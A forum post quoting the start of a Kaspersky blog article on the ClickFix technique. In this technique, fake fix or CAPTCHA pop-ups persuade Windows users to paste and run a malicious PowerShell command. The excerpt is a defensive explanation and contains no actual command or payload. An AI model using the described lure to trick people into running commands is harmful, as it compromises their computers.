Geeks for your information Security Security Vendors Kaspersky Kaspersky Security Blog v
ClickFix technique: what it is and why it’s dangerous
ClickFix technique: what it is and why it’s dangerous
harlan4096 Online
MalWare Zoo Team
*******
Posts: 14,505
Threads: 9,549
Thanks Received: 9,040 in 7,190 posts
Thanks Given: 9,816
Joined: 12 September 18
#1
Bug  30 April 25, 05:47
Quote:An infection tactic called ClickFix is becoming increasingly popular among cybercriminals. We explain how such attacks work and how to protect your company against it.
 
Attackers are increasingly using the ClickFix technique to infect Windows computers to force users to run malicious scripts manually. The use of this tactic was first seen in the spring of 2024. Since then, attackers have come up with a number of scenarios for its use.

What is ClickFix?

The ClickFix technique is essentially an attempt to execute a malicious command on the victim’s computer relying solely on social engineering techniques. Under one pretext or another, attackers convince the user to copy a long command line (in the vast majority of cases — a PowerShell script), paste it into the system’s Run window, and press Enter, which should ultimately lead to compromising the system.

The attack normally begins with a pop-up window simulating a notification about a technical problem. To fix this problem, the user needs to perform a few simple steps, which boil down to copying some object and executing it through the Run application. However, in Windows 11, PowerShell can also be executed from the search bar for applications, settings, and documents, which opens when you click on the icon with the system’s logo, so sometimes the victim is asked to copy something there.

[Image: what-is-clickfix-copyfix.png]
ClickFix attack – how to infect your own computer with malware in three easy steps. Source

This technique earned itself the name ClickFix because usually the notification contains a button, the name of which is somehow related to the verb “to fix” (Fix, How to fix, Fix it…), which the user needs to click to solve the alleged problem or see instructions for solving it. However, this isn’t a mandatory element — the need to launch some code can be justified by the requirement to check the computer’s security, or, for example, to confirm that the user is not a robot. In this case, the Fix button can be omitted.

Continue Reading...
Find
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)
[-]
Welcome
You have to register before you can post on our site.

Username/Email:


Password:

[-]
Recent Posts
GFYI [Official] Ashampoo® Photo Optimiz...
this tool would help...zevish — 07:18
Sandboxie 1.15.12 / 5.70.12
Sandboxie Plus ver...harlan4096 — 05:57
K-Lite Codec Pack 18.9.0 / 18.9.2 Update
Changes in 18.9.2 ...harlan4096 — 05:55
Brave 1.78.94
Release Channel 1....harlan4096 — 05:54
Gmail's new feature lets you react to em...
Google has launche...harlan4096 — 05:52

[-]
Birthdays
Today's Birthdays
avatar (44)centfootadoni
Upcoming Birthdays
avatar (27)akiratoriyama
avatar (47)Jerrycix
avatar (39)awedoli
avatar (81)WinRARHowTo
avatar (37)owysykan
avatar (48)beautgok
avatar (38)axuben
avatar (44)talsmanthago
avatar (30)mocetor
avatar (45)piomaibhaict
avatar (50)kingbfef
avatar (37)izenesiq
avatar (39)ihijudu
avatar (44)tiojusop
avatar (41)Damiennug
avatar (39)acoraxe
avatar (48)contjrat
avatar (40)axylisyb
avatar (43)tukrublape
avatar (40)iruqi
avatar (41)saitetib
avatar (35)ypasodiny
avatar (38)omapek
avatar (47)Geraldtuh
avatar (43)knigiJow
avatar (45)1stOnecal
avatar (49)Mirzojap
avatar (35)idilysaju
avatar (44)xclubDum
avatar (40)Stewartanilm
avatar (43)nikitaxople
avatar (39)GregoryRog
avatar (44)mediumog
avatar (39)odukoromu
avatar (45)Joanna4589

[-]
Online Staff
There are no staff members currently online.

>